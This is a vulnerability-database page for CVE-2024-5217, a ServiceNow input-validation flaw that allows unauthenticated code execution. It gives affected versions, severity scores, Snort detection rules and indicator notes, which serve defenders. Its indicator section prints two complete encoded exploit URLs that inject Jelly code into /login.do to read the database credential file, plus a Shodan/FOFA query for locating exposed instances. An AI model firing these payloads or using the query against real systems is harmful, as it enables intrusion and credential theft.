cbcvebase.
CVE-2024-5217
published 2024-07-10

CVE-2024-5217: ServiceNow has addressed an input validation vulnerability that was identified in the Washington DC, Vancouver, and earlier Now Platform releases. This…

PriorityP197critical9.8CVSS 3.1
AVNACLPRNUINSUCHIHAH
KEVITWEXPLOITInitial access
CISA Known Exploited Vulnerabilitydue 2024-08-19
Exploited in the wild
EPSS
99.63%
99.9th percentile
ServiceNow has addressed an input validation vulnerability that was identified in the Washington DC, Vancouver, and earlier Now Platform releases. This vulnerability could enable an unauthenticated user to remotely execute code within the context of the Now Platform. The vulnerability is addressed in the listed patches and hot fixes below, which were released during the June 2024 patching cycle. If you have not done so already, we recommend applying security patches relevant to your instance as soon as possible.

Affected

16 ranges
VendorProductVersion rangeFixed in
servicenownow_platform< Utah Patch 10 Hot Fix 3Utah Patch 10 Hot Fix 3
servicenownow_platform< Utah Patch 10a Hot Fix 2Utah Patch 10a Hot Fix 2
servicenownow_platform< Utah Patch 10b Hot Fix 1Utah Patch 10b Hot Fix 1
servicenownow_platform< Vancouver Patch 6 Hot Fix 2Vancouver Patch 6 Hot Fix 2
servicenownow_platform< Vancouver Patch 7 Hot Fix 3bVancouver Patch 7 Hot Fix 3b
servicenownow_platform< Vancouver Patch 8 Hot Fix 4Vancouver Patch 8 Hot Fix 4
servicenownow_platform< Vancouver Patch 9 Hot Fix 1Vancouver Patch 9 Hot Fix 1
servicenownow_platform< Vancouver Patch 10Vancouver Patch 10
servicenownow_platform< Washington DC Patch 1 Hot Fix 3bWashington DC Patch 1 Hot Fix 3b
servicenownow_platform< Washington DC Patch 2 Hot Fix 2Washington DC Patch 2 Hot Fix 2
servicenownow_platform< Washington DC Patch 3 Hot Fix 2Washington DC Patch 3 Hot Fix 2
servicenownow_platform< Washington DC Patch 4Washington DC Patch 4
servicenownow_platform< Washington DC Patch 5Washington DC Patch 5
servicenowservicenow
servicenowservicenow
servicenowservicenow

Detection & IOCsextracted from sources · hover to see the quote

url/login.do?jvar_page_title=%3Cstyle%3E%3Cj%3Ajelly%2Bxmlns%3Aj%3D%22jelly%3Acore%22%2Bxmlns%3Ag%3D'glide'%3E%3Cg%3Aevaluate%3Ez%3Dnew%2BPackages.java.io.File(%22%22).getAbsolutePath()%3Bz%3Dz.substring(0%2Cz.lastIndexOf(%22%2F%22))%3Bu%3Dnew%2BSecurelyAccess(z.concat(%22%2Fco..nf%2Fglide.db.properties%22)).getBufferedReader()%3Bs%3D%22%22%3Bwhile((q%3Du.readLine())!%3D%3Dnull)s%3Ds.concat(q%2C%22%5Cn%22)%3Bgs.addErrorMessage(s)%3B%3C%2Fg%3Aevaluate%3E%3C%2Fj%3Ajelly%3E%3C%2Fstyle%3E
url/login.do?jvar_page_title=%3c%73%74%79%6c%65%3e%3c%6a%3a%6a%65%6c%6c%79%20%78%6d%6c%6e%73%3a%6a%3d%22%6a%65%6c%6c%79%3a%63%6f%72%65%22%20%78%6d%6c%6e%73%3a%67%3d%27%67%6c%69%64%65%27%3e%3c%67%3a%65%76%61%6c%75%61%74%65%3e%7a%3d%6e%65%77%20%50%61%63%6b%61%67%65%73%2e%6a%61%76%61%2e%69%6f%2e%46%69%6c%65%28%22%22%29%2e%67%65%74%41%62%73%6f%6c%75%74%65%50%61%74%68%28%29%3b%7a%3d%7a%2e%73%75%62%73%74%72%69%6e%67%28%30%2c%7a%2e%6c%61%73%74%49%6e%64%65%78%4f%66%28%22%2f%22%29%29%3b%75%3d%6e%65%77%20%53%65%63%75%72%65%6c%79%41%63%63%65%73%73%28%7a%2e%63%6f%6e%63%61%74%28%22%2f%63%6f%2e%2e%6e%66%2f%67%6c%69%64%65%2e%64%62%2e%70%72%6f%70%65%72%74%69%65%73%22%29%29%2e%67%65%74%42%75%66%66%65%72%65%64%52%65%61%64%65%72%28%29%3b%73%3d%22%22%3b%77%68%69%6c%65%28%28%71%3d%75%2e%72%65%61%64%4c%69%6e%65%28%29%29%21%3d%3d%6e%75%6c%6c%29%73%3d%73%2e%63%6f%6e%63%61%74%28%71%2c%22%5c%6e%22%29%3b%67%73%2e%61%64%64%45%72%72%6f%72%4d%65%73%73%61%67%65%28%73%29%3b%3c%2f%67%3a%65%76%61%6c%75%61%74%65%3e%3c%2f%6a%3a%6a%65%6c%6c%79%3e%3c%2f%73%74%79%6c%65%3e
path/login.do
snort
alert http any any -> $HOME_NET any (msg:"ET WEB_SPECIFIC_APPS ServiceNow Command Injection Attempt (CVE-2024-5217,2024-4879) M2"; flow:established,to_server; http.method; content:"POST"; http.uri; bsize:9; content:"/login.do"; http.request_body; content:"jvar_page_title|3d|"; fast_pattern; pcre:"/^.*?(?:javascript|style)/R"; reference:cve,2024-5217; reference:cve,2024-4879; reference:url,www.assetnote.io/resources/research/chaining-three-bugs-to-access-all-your-servicenow-data; reference:url,www.resilientx.com/blog/cve-2024-5217-servicenow-vulnerability; classtype:attempted-admin; sid:2060409; rev:1; metadata:affected_product ServiceNow, attack_target Server, tls_state plaintext, created_at 2025_02_27, cve CVE_2024_5217, deployment Perimeter, deployment Internal, performance_impact Low, confidence High, signature_severity Major, tag Exploit, tag CISA_KEV, updated_at 2025_02_27, mitre_tactic_id TA0001, mitre_tactic_name Initial_Access, mitre_technique_id T1190, mitre_technique_name Exploit_Public_Facing_Application;)
snort
alert http any any -> $HOME_NET any (msg:"ET WEB_SPECIFIC_APPS ServiceNow Command Injection Attempt (CVE-2024-5217,2024-4879) M4"; flow:established,to_server; http.method; content:"GET"; http.uri; content:"/login.do"; startswith; content:"jvar_page_title|3d|"; distance:0; fast_pattern; pcre:"/^.*?(?:javascript|style)/R"; content:"j|3a|jelly|20|xmlns|3a|j|3d 22|jelly|3a|core|22 20|xmlns|3a|g|3d 27|glide|27|"; within:80; reference:cve,2024-5217; reference:cve,2024-4879; reference:url,www.assetnote.io/resources/research/chaining-three-bugs-to-access-all-your-servicenow-data; reference:url,www.resilientx.com/blog/cve-2024-5217-servicenow-vulnerability; classtype:attempted-admin; sid:2060429; rev:1; metadata:affected_product ServiceNow, attack_target Server, tls_state plaintext, created_at 2025_02_27, cve CVE_2024_5217, deployment Perimeter, deployment Internal, performance_impact Low, confidence High, signature_severity Major, tag Exploit, tag CISA_KEV, updated_at 2025_02_27, mitre_tactic_id TA0001, mitre_tactic_name Initial_Access, mitre_technique_id T1190, mitre_technique_name Exploit_Public_Facing_Application;)
  • Exploit targets GET /login.do with jvar_page_title parameter containing URL-encoded Jelly template injection (<j:jelly xmlns:j="jelly:core" xmlns:g='glide'><g:evaluate>...) to achieve unauthenticated RCE. Look for this parameter in HTTP GET requests to /login.do.
  • POST variant also observed: attacker POSTs to /login.do with jvar_page_title= in the request body containing javascript or style tags. Monitor POST body for 'jvar_page_title=' combined with 'javascript' or 'style' keywords.
  • Successful exploitation response contains the string 'glide.db.user' in the HTTP response body, indicating database credential file (glide.db.properties) was read. Use this as a response-side detection indicator.
  • Exploitation involves a two-stage payload: first stage checks for a specific result in the server response, second stage checks database contents and dumps user lists and account credentials (often hashed, sometimes plaintext).
  • CVE-2024-5217 is chained with CVE-2024-4879 and CVE-2024-5178 for full database access. Detections for any one of these three CVEs should trigger investigation for the others.
  • Use Shodan query http.favicon.hash:"1701804003" or FOFA query icon_hash=1701804003 to enumerate internet-exposed ServiceNow instances for attack surface mapping.
  • The vulnerability is in the GlideExpression script component. Monitor for Jelly template syntax (j:jelly, g:evaluate, xmlns:j="jelly:core") appearing in any HTTP parameter on ServiceNow endpoints.
  • ·ServiceNow-hosted (SaaS) instances received fixes earlier on May 14, 2024, before the June/July 2024 patch cycle. Self-hosted/on-premises instances require manual patching. Verify patch status per deployment type.
  • ·Affected platform versions include Utah, Vancouver, and Washington DC Now Platform releases. Ensure patching covers all three named release trains.

CVSS provenance

nvdv3.19.8CRITICALCVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
nvdv4.09.2CRITICALCVSS:4.0/AV:N/AC:L/AT:P/PR:N/UI:N/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X
vulncheck9.3CRITICAL
cisa9.2CRITICAL
CVEs like this are exactly what “Exploited This Week” covers.

Every Monday: what got weaponized or added to CISA KEV in the last seven days — each CVE cross-linked to its PoC, Nuclei template, and detection rule. Free, one email a week, unsubscribe in one click.